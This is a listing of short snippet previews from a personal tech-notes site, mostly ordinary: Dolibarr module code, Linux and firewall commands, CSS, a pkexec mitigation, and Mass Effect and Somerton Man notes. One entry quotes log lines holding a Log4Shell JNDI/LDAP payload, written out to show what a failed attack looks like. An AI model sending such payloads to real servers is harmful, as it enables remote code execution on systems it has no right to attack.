Last Created Entries

Last created entries!
^Top
<< Back
Mobile-Menu










Add Module Tab

Views: 54
Created: 2023-01-10 08:47:25
Modified: 2023-09-24 02:02:13

// Array to add new pages in new tabs or remove existing one<br role="presentation" />$this-&gt;tabs =<br role="presentation" />array('objecttype:+tabname1:Title1:mylangfile@mymodule:$user-&gt;rights-&gt;mymodule-&gt;read:/mymodule<br role="presentation" />/mypagetab1.php?id=__ID_...

Add Module Menue

Views: 52
Created: 2023-01-10 08:47:25
Modified: 2023-09-23 08:19:15

// Main menu entries<br role="presentation" />$this-&gt;menu = array(); // List of menus to add<br role="presentation" />$r=0;<br role="presentation" />// Add here entries to declare new menus<br role="presentation" />// Example to declare the Top Menu entry:<br role="prese...

Add Module Permission

Views: 43
Created: 2023-01-10 08:47:25
Modified: 2023-09-22 16:29:35

$this-&gt;rights[$r][0] = 10001;<br role="presentation" />$this-&gt;rights[$r][1] = 'Label by default of permission';<br role="presentation" />$this-&gt;rights[$r][2] = 'r';<br role="presentation" />$this-&gt;rights[$r][3] = 1;<br role="presentation" /&...

Default Rights Variables

Views: 46
Created: 2023-01-10 08:47:25
Modified: 2023-09-25 03:40:32

Bank and Cash -&gt;banque-&gt;lire, -&gt;banque-&gt;modifier, -&gt;banque-&gt;configurer, -&gt;banque-&gt;consolidate, -&gt;banque-&gt;export, -&gt;banque-&gt;transfer, -&gt;banque-&gt;cheque Barcode -&gt;barcode-&gt;lire, -&gt;barcode-&gt;creer, -&gt;barcode-&gt;suppr...

Add Module Extrafields

Views: 54
Created: 2023-01-10 08:47:25
Modified: 2023-09-24 22:47:40

addExtraField ( $attrname,$label, $type, $pos,$size,$elementtype,$unique = 0,$required = 0,$default_value = '',<br role="presentation" />$param = '',$alwayseditable = 0,$perms = '',$list = '-1',$help = '',$computed = '',$entity = '',$langfile = '',$enabl...

Major Changes from v13 to v14

Views: 76
Created: 2023-01-10 08:47:25
Modified: 2023-09-24 07:22:30

* Module SimplePOS is deprecated. If you need a POS module, please use the module TakePOS.<br role="presentation" />* The ICS value for direct debit or credit transfer is now stored on each bank account instead of<br role="presentation" />into the global setup.<br role="presentation" />* API /setup/sh...

Remove a Hard-Deleted Module

Views: 57
Created: 2023-01-10 08:47:25
Modified: 2023-09-24 22:49:40

If you deleted a module via FTP or etc, and getting error messages about missing files - delete all module constants in llx_const. If the module name was "xxx" the consts would be: MAIN_MODULE_XXX<br />...

There is no custom directory

Views: 43
Created: 2023-01-10 08:47:25
Modified: 2023-09-23 14:17:03

This notice appears in the readme of almost all Dolibarr Modules.<br role="presentation" />Note: If this screen tell you there is no custom directory, check your setup is correct:<br role="presentation" />- In your Dolibarr installation directory, edit the ``````htdocs/conf/conf.php`````` file and check that<br ro...

img_picto Function

Views: 60
Created: 2023-01-10 08:47:25
Modified: 2023-09-23 14:52:33

img_picto()<br role="presentation" />Example:<br role="presentation" />img_picto(path,name);<br role="presentation" />Usage:<br role="presentation" />img_picto() will print an image with the path and title provided in the function ...

GETPOSTISSET Function

Views: 43
Created: 2023-01-10 08:47:25
Modified: 2023-09-22 04:56:19

GETPOSTISSET()&nbsp; Example:<br role="presentation" />if (GETPOSTISSET('varname')){...}<br role="presentation" />Usage:<br role="presentation" />GETPOSTISSET will check if a $_POST or $_GET Variable with name "varname" is set...

GETPOST Function

Views: 57
Created: 2023-01-10 08:47:25
Modified: 2023-09-24 17:23:39

GETPOST Function to get a value out of $_POST or $_GET request.<br role="presentation" />Varname: Is the name of the vaue provided via the request. The value will be stored in<br role="presentation" />$monChamp.<br role="presentation" />INT: Is a checking string. In this case it checks the value of th...

Status Identifiers

Views: 78
Created: 2023-01-10 08:47:25
Modified: 2023-09-23 05:50:08

FK_STATUT<br role="presentation" />Angebote<br role="presentation" />&bull; 0 - Entwurf nicht best&auml;tigt<br role="presentation" />&bull; 1 - Amngebot ist offen<br />&bull; 2 - unterzeichnet / beauftragt / abrechenbar<br role="presentation" />&bull; 3- Nich...

Triggers

Views: 56
Created: 2023-01-10 08:47:25
Modified: 2023-09-23 05:51:31

Here you can see a list of general dolibarr triggers! Trigger code ($action) Type object ($object) USER_CREATE user.class.php USER_MODIFY user.class.php USER_DELETE user.class.php USER_LOGIN user.class.php USER_LOGIN_FAILED user.class.php USER_LOGOUT user.class.php USER_ENABLEDISABLE user.class.php USER_NEW_PASSWORD user.class.php USER_SETINGROUP u...

3.16.1 Keyboard Bindings

Views: 243
Created: 2022-02-16 16:17:13
Modified: 2023-09-24 13:13:10

Flight Radar --------------<br /> Tab&nbsp;&nbsp;&nbsp;&nbsp; PING<br /> Period&nbsp;&nbsp;&nbsp; INCREASE<br /> Comma&nbsp;&nbsp; DECREASE FLIGHT TARGETING --------------<br /> 9&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; HAIL TARGET<br /> 1-3&nbsp;&am...

Polkit PKExec Vulnerability

Views: 303
Created: 2022-01-29 22:58:22
Modified: 2023-09-23 22:49:18

The most actual systems have an update for this. If not you can close this vulnerability by executing:<br /> chmod 0755 /usr/bin/pkexec This will remove the SUID Bit from the File.<br /> More info here: https://nvd.nist.gov/vuln/detail/CVE-2021-4034 Image for the Thumbnail: ...

How does a Fail Log4J Attack look in Logfiles

Views: 458
Created: 2022-01-29 22:55:42
Modified: 2023-09-22 13:45:21

[Fri Jan 28 03:42:04.636333 2022] [proxy:warn] [pid 30819] [client 98.0.242.10:46192] AH10188: Max-Forwards value &#39;${jndi:ldap://X.X.X.X:1389/a}&#39; could not be parsed, referer: ${jndi:ldap://X.X.X.X:1389/a}<br /> [Fri Jan 28 03:42:04.636394 2022] [proxy:error] [pid 30819] [client 98.0.242.10:46192] AH00898: Max-Forwards request...

How to replace String in Text with SQL

Views: 516
Created: 2021-11-30 17:22:34
Modified: 2023-09-23 17:07:31

Here is an example how to replace for example the string &quot;https://test.de/testthis/&quot; with &quot;https://newlink.de/testthis/&quot;. The code is: UPDATE tablenamehere<br /> SET columnname = REPLACE(columnname , &#39;test.de&#39;, &#39;newlink.de&#39;); ...

How to Reverse an Android classes File

Views: 635
Created: 2021-11-06 00:55:37
Modified: 2023-09-24 20:18:48

1. Rename your .apk to .zip<br /> 2. Unzip<br /> 3. locate classes.dex<br /> 4. Download Dex2Jar (Windows/Linux)<br /> 5. Use cmd/shell to navigate to dex2jar Folder.<br /> 6. Use command &quot;dex2jar &lt;source&gt;&quot; with source as your classes.dex file.<br /> 7. Now you have a new .jar file...

Cipher Sheet

Views: 589
Created: 2021-11-06 00:22:05
Modified: 2023-09-22 11:51:09

Only to store. I am not working on this enigma Cr4P ...

Cipher Sheets

Views: 573
Created: 2021-11-06 00:17:44
Modified: 2023-09-24 11:19:06

Here are the copies of the unknown book that i found. Page after page... &nbsp; &nbsp; ...

General Informations about Cipher

Views: 655
Created: 2021-10-29 19:10:57
Modified: 2023-09-25 06:56:21

The &quot;Sommerton Man&quot; is an unknown person who died on the 30. Nov 1948 in Australia. Here you can get the Autopsy Report. The cause of death is unknown, but its rumored that he died from intoxication of an unknown poison.A Cipher has been found under mysterious cirmunstances which seems like a digitless code.<br /> <br /&g...

Content Security Headers

Views: 549
Created: 2021-10-17 04:21:30
Modified: 2023-09-24 16:14:15

Content Security Header (HSTS) Apache:<br /> Header set Strict-Transport-Security &quot;max-age=31536000; includeSubDomains; preload&quot; Nginx:<br /> add_header Strict-Transport-Security &#39;max-age=31536000; includeSubDomains; preload&#39;; Content Security Policy (CSP) Apache:<br /> Header always set Content-S...

Simple Firewall Setup Script

Views: 488
Created: 2021-08-16 16:24:41
Modified: 2023-09-22 06:36:14

Attention! This script has been written 2010 and could be outdated. Start.SH - Start Firewall #!/bin/sh<br /> #Start Firewall<br /> #Copyright by Xeno<br /> # echo<br /> echo Firewall Starter<br /> echo<br /> echo Die Firewall wird gestartet und der Port 22 SSH<br /> echo f&uuml;r die Fernkontrolle frei...

Pop Up with pure CSS and Checkbox

Views: 698
Created: 2021-08-06 02:06:40
Modified: 2023-09-22 20:30:02

&lt;!doctype html&gt;<br /> &lt;html&gt;<br /> &lt;head&gt;<br /> &lt;meta charset=&quot;utf-8&quot;&gt;<br /> &lt;meta http-equiv=&quot;X-UA-Compatible&quot; content=&quot;IE=edge,chrome=1&quot;&gt;<br /> &lt;meta name=&quot;viewport&quot; con...

Animated Border Box with CSS

Views: 602
Created: 2021-08-02 01:38:52
Modified: 2023-09-19 00:16:36

Code for an Animated Border on a Box, only with CSS and HTML used! &lt;style&gt;<br /> &nbsp;&nbsp; &nbsp;.container{&nbsp; padding-top: 20px;<br /> &nbsp;&nbsp; &nbsp;&nbsp; padding-bottom: 20px;}<br /> &nbsp;&nbsp; &nbsp; &nbsp;<br /> &nbsp;&nbsp; &nbsp;.b...

Generic HTACCESS Forces SSL & Non-WWW

Views: 441
Created: 2021-08-01 07:59:02
Modified: 2023-09-22 02:04:05

This is the code for an .htaccess file which does: -&gt; Redirect all www requests to non-www requests<br /> -&gt; Always force SSL<br /> <br /> RewriteCond %{HTTPS} !=on<br /> RewriteRule ^ https://%{HTTP_HOST}%{REQUEST_URI} [L,R=301]<br /> RewriteCond %{HTTP_HOST} ^www\\.(.*)$ [NC]<br /> RewriteRule ^(....

Simple Pie Chart with HTML and CSS

Views: 547
Created: 2021-07-11 18:40:27
Modified: 2023-09-22 03:23:00

&lt;style&gt;<br /> .pie {<br /> &nbsp;&nbsp; &nbsp; /* Basic layout */<br /> &nbsp;&nbsp; &nbsp; display: inline-block;<br /> &nbsp;&nbsp; &nbsp; width: 10em;<br /> &nbsp;&nbsp; &nbsp; height: 10em;<br /> &nbsp;&nbsp; &nbsp; border-radius: 50%; ...

Flicker Text

Views: 582
Created: 2021-06-20 02:03:59
Modified: 2023-09-22 10:24:15

Flicker Text Example &lt;style&gt;@keyframes textflicker {<br /> &nbsp; from {text-shadow: 1px 0 0 #C1C1C1, -2px 0 0 #000000}<br /> &nbsp; to {text-shadow: 2px 0.5px 2px #C1C1C1, -1px -0.5px 2px #000000;}}<br /> #statered2 { padding: 1em;<br /> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; colo...

Set A Forward Route

Views: 574
Created: 2021-03-23 21:32:23
Modified: 2023-09-20 06:13:14

Here is a sample command for cmd to set a Port Forwarding on a Windows Client Example:<br /> netsh interface portproxy add v4tov4 listenaddress=192.168.178.54 listenport=1254 connectaddress=192.168.178.55 connectport=80 ...

Commit an Update to Repository [CLI]

Views: 641
Created: 2021-03-09 11:33:33
Modified: 2023-09-25 00:57:03

Create a new Repository from Command Line echo &quot;# asd&quot; &gt;&gt; README.md<br /> git init<br /> git add README.md<br /> git commit -m &quot;first commit&quot;<br /> git branch -M main<br /> git remote add origin https://github.com/bugfishtm/asd.git<br /> git push -u origin main Pu...

Git Clone with Command Line

Views: 654
Created: 2021-03-09 10:56:46
Modified: 2023-09-24 12:06:26

How to use git to clone a remote repository? Open the CommandLine Navigate to the Folder You want to get the repository cloned to Execute Git Command: &quot;git clone https://yourgitlaburl.url/group/repository.git&quot; Now the actual repository files should be in your Folder. A successfull output looks like this: Cloning into &#39;exam...

Command Line Hints

Views: 714
Created: 2021-03-08 17:22:19
Modified: 2023-09-22 23:55:37

Find a String inside Files<br /> grep -rnw &#39;/path/to/somewhere/&#39; -e &#39;pattern&#39;<br /> <br /> Find File in Folder Structure<br /> find ./ -name card.php Display Linux System Informations<br /> uname Display Kernel Releases Informations<br /> uname -r Display Systems uptime and load av...

Postfix Backup Mailserver

Views: 690
Created: 2021-02-16 19:22:39
Modified: 2023-09-24 20:20:12

This is an easy postfix configuration to backup all emails going to specified domains until the master server is online again. &nbsp; Postfix Configuration [replace yourhostname with your hostname]: smtpd_relay_restrictions = permit_mynetworks permit_sasl_authenticated reject_unauth_destination<br /> myhostname = yourhostname<br /> ...

Linux make file Immune

Views: 715
Created: 2021-02-13 10:44:11
Modified: 2023-09-24 16:27:10

This unix Command will make a file non-writable. Make non-Writable chattr +i file Make writable again chattr -i file See Status: lsattr file ...

Forward Port with IPTables

Views: 633
Created: 2021-02-09 09:24:37
Modified: 2023-09-22 01:01:04

This adds a rule to forwars port 1022 to port 22 (SSH) an another internal IP.<br /> iptables -t nat -A PREROUTING -i vmbr0 -p tcp --dport 1022 -j DNAT --to 192.168.137.100:22<br /> <br /> This removes the previous commands changes:<br /> &nbsp;iptables -t nat -D PREROUTING -i vmbr0 -p tcp --dport 1022 -j DNAT --to 192.1...

Proxmox Bridge and Nat Interfaces Example

Views: 696
Created: 2021-01-27 05:46:00
Modified: 2023-09-24 04:10:37

This script is for a proxmox host to set up 2 bridges. 1 provides static ip 4 and 6 to vservers<br /> 1 provides NAT routed connection &nbsp; Start of /etc/network/interfaces # This file describes the network interfaces available on your system<br /> # and how to activate them. For more information, see interfaces(5). source /etc/ne...

Safari Browser z-Index not Working

Views: 1038
Created: 2020-12-22 01:41:41
Modified: 2023-09-24 15:30:45

If you encounter z-Index Problems on safari you can try to put that code into your z-indexed element: &nbsp;&nbsp; &nbsp;&nbsp;&nbsp;&nbsp; -webkit-transform: translate3d(0, 0, 0);<br /> &nbsp;&nbsp; &nbsp;&nbsp;&nbsp; &nbsp;transform: translate3d(0, 0, 0); ...

Prevent Padding and Border from changing Element Width

Views: 633
Created: 2020-12-21 19:55:51
Modified: 2023-09-22 09:26:33

Put this into an element to prevent padding / borders from changing the width of an element. -webkit-box-sizing: border-box; /* Chrome */ -moz-box-sizing: border-box; /* Firefox */ box-sizing: border-box; /* Opera/IE */ ...

Paragon Savegame

Views: 603
Created: 2020-12-09 06:54:39
Modified: 2023-09-22 12:03:24

You can download my full Paragon Savegame here! Details:<br /> -&gt; All Missions and DLC Mission achieved<br /> -&gt; Cerberus has taken over Collectors Ship<br /> -&gt; All Crew Members and Kaidan survived<br /> -&gt; Council Survived<br /> -&gt; ME2 has been played with ME1 full Paragon Savegame ...

Anomaly: Gei Hinnom

Views: 658
Created: 2020-12-09 06:50:52
Modified: 2023-09-24 04:12:19

Objective is to locate a protean sphere and report it to the citadel.<br /> Location: Gei Hinnom / Sheol / Hades Nexus Unfortunately there are no Images available. ...

Anomaly: Aequitas

Views: 576
Created: 2020-12-09 06:48:14
Modified: 2023-09-22 20:07:06

Objective is to clear the mine from transformed workers.<br /> Location: Aequitas / Fortis /&nbsp; Minos Wasteland<br /> Unfortunately we have no Images available related to this Mission. ...

Anomaly: Canalus

Views: 699
Created: 2020-12-09 06:44:33
Modified: 2023-09-23 04:46:24

Objective is to disable a Geth Weather device, which changes the planets atmossphere.<br /> Location: Canalus / Dirada / Pylos Nebula ...

Anomaly: Sinmara

Views: 621
Created: 2020-12-09 06:41:18
Modified: 2023-09-22 03:32:49

Objective is to repair the magnetic shield, which protects the planet from interstellar radiation.<br /> Location: Sinmara / Solveig / Caleston Rift ...

Anomaly: Zada Ban

Views: 589
Created: 2020-12-09 06:38:17
Modified: 2023-09-24 07:43:48

Objective is to destroy a vorcha weapons base and flee from the location.<br /> Location: Zada Ban / Xe Cha /&nbsp; The Shrike Abysall ...

Anomaly: Zanethu

Views: 637
Created: 2020-12-09 06:35:34
Modified: 2023-09-22 14:52:51

Objective is to secure mainframe data from an ancient ship, which is in danger to fall from a cliff.<br /> Location: Zanethu&nbsp; / Ploitari / Hourglass Nebula ...

Anomaly: Neith

Views: 642
Created: 2020-12-09 06:32:38
Modified: 2023-09-22 11:01:50

Objective is to disable the Rescue Beacon and fight the malfunctioning LOKI Mechs.<br /> Location: Neith / Amun / Eagle Nebula ...

Anomaly: Taitus

Views: 664
Created: 2020-12-09 06:29:52
Modified: 2023-09-22 04:57:08

Objective is to reactivate a mesh and use him to break all walls which are blocking the way to retrieve an ancient artifact.<br /> Location: Taitus / Talava / Caleston rift ...

Anomaly: Joab

Views: 610
Created: 2020-12-09 06:25:10
Modified: 2023-09-24 07:48:08

Illegal Mercenary Activity on this planet to take care of.<br /> Location: Joab / Enoch /&nbsp; Rosetta Nebula ...

Anomaly: Helyme

Views: 605
Created: 2020-12-09 06:22:17
Modified: 2023-09-23 08:25:10

Objective is to destroy a mercenary base and decrypt a hostile message.<br /> Location: Helyme / Zelene /&nbsp; Crescent Nebula ...

Get Remote HTML Code as String

Views: 746
Created: 2020-11-22 17:58:28
Modified: 2023-09-23 16:38:18

Here is an example function to get the full html output code of an URL provided to the function into a string.<br /> You can get the data by using a string variable which gets the output: string variable = gethtmlcontent(&quot;https://thisisapage&quot;); &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&...


Warning: Array to string conversion in /home/bugfish/public_html/_site/btm/init.php on line 82
Switches: 0 | Arrivals: 0 | Visits: 0
This Website is using Session Cookies for Site Functionality.